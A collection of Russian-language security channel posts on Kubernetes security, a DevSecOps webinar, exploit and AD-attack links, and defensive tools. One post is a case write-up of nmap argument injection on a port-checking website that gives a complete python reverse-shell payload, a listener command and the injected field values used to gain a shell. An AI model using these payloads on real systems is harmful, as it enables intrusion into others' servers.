Я думаю, что сегодня все понятно просто по стартовой картинке =)

Да, оказывается уже есть OWASP Kubernetes Top 10! Проект молодой и еще не до конца доделанный - на текущие момент описано 7 или 10 пунктов (хотя и у тех 7 внутри не все еще готово). По задумке авторов каждый из пунктов состоит из разделов:
- Overview
- Description
- How to Prevent
- Example Attack Scenarios
- References

Сам рейтинг:
K01:2022 Insecure Workload Configurations
K02:2022 Supply Chain Vulnerabilities
K03:2022 Overly Permissive RBAC Configurations
K04:2022 Lack of Centralized Policy Enforcement
K05:2022 Inadequate Logging and Monitoring
K06:2022 Broken Authentication Mechanisms
K07:2022 Missing Network Segmentation Controls
K08:2022 Secrets Management Failures
K09:2022 Misconfigured Cluster Components
K10:2022 Outdated and Vulnerable Kubernetes Components

Какое мое мнение по этому рейтингу? Напишу в завтрашнем посте ;)

​Решаем проблему раннего обнаружения уязвимостей в коде

📅 26 июля в 18:00 по мск в Слёрм пройдёт вебинар «Решаем проблему раннего обнаружения уязвимостей в коде». Вы узнаете, как Jenkins работает с утилитами SonarQube, Dependency Check и Clair, и поймёте, как он помогает находить уязвимости в коде на ранних стадиях. А ещё на практике разберёте пайплайн, который выполняет проверки и уведомляет о найденных уязвимостях.

Кому будет полезно

Вебинар посвящён всегда актуальной теме безопасности приложений и ориентирован на DevOps-инженеров и тех, кто интересуется DevSecOps.

Чем займёмся на вебинаре

📌 Разберём, насколько совместим Jenkins с такими системами и утилитами как SonarQube, Dependency Check и Clair.
📌 Покажем, как на ранних стадиях находить уязвимости в коде, зависимостях и Docker-образах.
📌 Рассмотрим конкретный пайплайн, который выполняет проверки и уведомляет о найденных уязвимостях.

Спикер

Разобраться в тонкостях работы с Jenkins вам поможет Кирилл Борисов — Infrastructure Engineer технологического центра Deutsche Bank.

Участие в вебинаре бесплатное, но чтобы получить ссылку на трансляцию, нужно занять место заранее 👉 https://slurm.club/3zjs09M

CVE-2022-34918: Linux Kernel LPE PoC

https://github.com/randorisec/CVE-2022-34918-LPE-PoC

+ ресерч: https://randorisec.fr/crack-linux-firewall/

#exploit #git

DiagTrackEoP
Just another way to abuse SeImpersonate privilege.

#Windows #Privesc
https://github.com/Wh04m1001/DiagTrackEoP

Пока сетевики учили питон, он протух, и надо начинать учить Go.
Пока сетевики думали внедрять NETCONF, он протух, и надо начинать внедрять gNMI.
Чуете, чем пахнет? Пахнет очередным хайпом, который обещает волной снести старый мир и на его руинах построить новый. С чем мы и разбираемся в последнем telecom-подкасте.
https://linkmeup.ru/podcasts/2196/
https://youtu.be/aX-2r-tNxvQ

#SOC #Blueteam #Threathunting

Боевик по мотивам противостояния Standoff 11 2022. В главных ролях: Codeby team, PT SOC team.

https://habr.com/ru/company/pt/blog/678832/

Цикл статей об атаках на AD. Перевод c https://zer1t0.gitlab.io/posts/attacking_ad/

#AD #Redteam #pentest

https://defcon.ru/penetration-testing/18872/

#OffensiveSecurity понимают что нужно успевать за трендами и открывают новое направление своих курсов в области безопасности облаков - CLD-100.

CLD-100 is fundamental cloud security training for individuals that want to start working towards a specialization in cloud security.

The content in this new training is completely vendor-neutral and will teach students the underlying security concepts of cloud computing. This means that it will provide you with the fundamentals of the technologies and security considerations that underpin the cloud in such a way that can be applied to any cloud vendor, be it Amazon Web Services, Google Cloud, or Microsoft Azure.

With this release, you will be able to access the following cloud security Topics, with more Topics to be released continuously:

Introduction to Cloud 100
Containers for Cloud
Introduction to Kubernetes
Discovering Exposed Docker Sockets
Discovering Exposed Kubernetes Dashboards

Ждём более практический и «хакерский» курс CLD-200!

Очень давно был интересный кейс с сайтом для системных администраторов, где можно было проверить открыт ли порт сайта. Первое, что пришло голову, это вписать в IP:

127.0.0.1 -h

В результате сайт вернул мануал nmap-a. Но многие символы фильтровались и выйти за переделы команды nmap-а не удалось. После этого, путем проб и ошибок, был найден интересный вектор remote code execution.

В составе nmap есть модуль http-fetch, который умеет ходить по URL и скачивать файлы. Более того, можно даже указать куда сохранить файл. Немного покурив, как работают скрипты nmap, было обнаружено, что через функцию os.execute() можно выполнять команды.

0) На своем сервере открываем порт 8888:

nc -lvp 8888

Допустим IP вашего сервера 1.1.1.1

1) Создаем у себя на сервере файл index.php с содержимым:

os.execute("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"1.1.1.1\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'")

2) Запускаем встроенный сервер php:

php -S 0.0.0.0:8080

3) На атакуемом сайте вместо IP пишем:

1.1.1.1 -script http-fetch

Вместо порта:

8080 -dd -script-args destination=/tmp

Т.е. на бэкенде сайта команда преобразуется в что-то типа:

nmap 1.1.1.1 -script http-fetch -p 8080  -dd -script-args destination=/tmp

В результате выполнения этой команды, по пути /tmp/1.1.1.1/8080/index.html будет лежат скрипт с первого шага.

4) Запускаем скачанный скрипт, вписав вместо порта:

8080 -dd -script /tmp/1.1.1.1/8080/index.html 

и получаем бэкконнект.

Таким образом, иногда необязательно выходить за рамки команды, вписывая такие символы, как | & ;.

Вот такой вот зиродей😁

#case #nmap #research #rce

Как то раз на проекте столкнулся с непонятной СЗИ, которая блокировала Collectors bloodhound, как SharpHound, так и bloodhound-python. Я видел 2 варианта решения проблемы:
1. Понять что меня блочит и пробовать обойти блокировки;
2. Попробовать собрать с LDAP данные другими инструментами, желательно легитимными.
Я решил пойти вторым путём и попробовать посмотреть ACL в AD руками. На самом деле, часто BloodHound избыточен, и достаточно посмотреть, есть ли модифицированные привилегии на корневой объект домена. Если есть - то смотреть от кого и проанализировать их ACL. Чем удобнее всего это сделать? Всем по разному, но я использую инструмент Sysinternals AdExplorer.
В AdExplorer есть функционал "Create Snapshot" - данная функция позволяет сдампить LDAP и анализировать его в режиме offline. В этот момент моё сердце забилось чаще, и я бросился в гугл искать, возможно кто-то написал конвертер из дампа AdExplorer в Bloodhound.
По первой же ссылке я столкнулся со скриптом, который отлично выполнил свою задачу, и противную СЗИ я оставил с носом. Берите на вооружение, очень хороший инструмент 🙂

This tool extracts ****** **** numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.

DISCLAIMER:
All the information provided on this channel are for educational and informational purposes only. Any use of this information is therefore strictly at your own risk.

#pentesting #AD #Windows #netsec

https://github.com/snovvcrash/PCredz

Отличный доклад "Харденинг K8S. (Не)очевидные настройки" от моего хорошего товарища поможет правильно посмотреть на CIS Kubernetes Benchmarks.

Очень важно помнить, что не стоит слепо следовать всем требованиям любого Benchmark. Ко всему стоит подходить с чувством, с толком, с расстановкой. Обычно относительно CIS Kubernetes Benchmarks, специалисты изучают его, накладывают на свою инфраструктуру и оставляют 10-20 значимых пунктов и их контролируют, а не слепо добиваются 100% покрытия его. Хорошо это еще все сразу заложить и проверять на стадии IaC, чтобы не пересканитивать это постоянно (особенно с учетом Container-Optimized OS).

🦮 BlueHound

It is an open-source tool that helps blue teams pinpoint the security issues that actually matter. By combining information about user permissions, network access and unpatched vulnerabilities, BlueHound reveals the paths attackers would take if they were inside your network
It is a fork of NeoDash, reimagined, to make it suitable for defensive security purposes.

Blog:
🔗 https://zeronetworks.com/blog/bluehound-community-driven-resilience/

Tool:
🔗 https://github.com/zeronetworks/BlueHound

#ad #sharphound #blueteam

🙀 Our researcher Arseniy Sharoglazov found a new technique for discovering second-level domains!
Useful for:
🐞 Bughunters, for discovering vulns on new domains
🐛 Threathunters, for discovering malicious domains
🎃 Everyone else

Read the research: https://swarm.ptsecurity.com/discovering-domains-via-timing-attack/

Тема сегодняшнего поста это Threat Modeling для Kubernetes методом STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege).

Занимался кто?)

Думаю если и да, то совсем мало кто ... Ведь сидеть разбираться в этом, закапываться в какие-то бумаги мало кто из нас хочет.

Но, одни добрые ребята, взяли и позволили это дело значительно упростить!

В итоге процесс выглядит следующим образом:
1) Скачиваем Microsoft Threat Modeling Tool (MS-TMT)
2) Скачиваем шаблон для этой MS-TMT для поддержки k8s (его как раз ребята и написали и выложили в открытый доступ)
3) Начинаем из разных предоставленных субъектов и объектов рисовать в MS-TMT свою диаграмму взаимодействий между разными ними и обозначать границы доверия (а может у вас ZeroTrust).
4) Далее система сама эта проанализирует и сгенерирует отчет с обнаруженными угрозами по STRIDE.
5) Занимаемся анализом угроз в MS-TMT - отмечаем как: требует исследования, не применима или уже имеет тако-то митигейшен.

*CRTO cheetsheet*

#redteam #AD #CRTO #cheetsheet

https://www.xmind.app/m/874LNH/#devsecops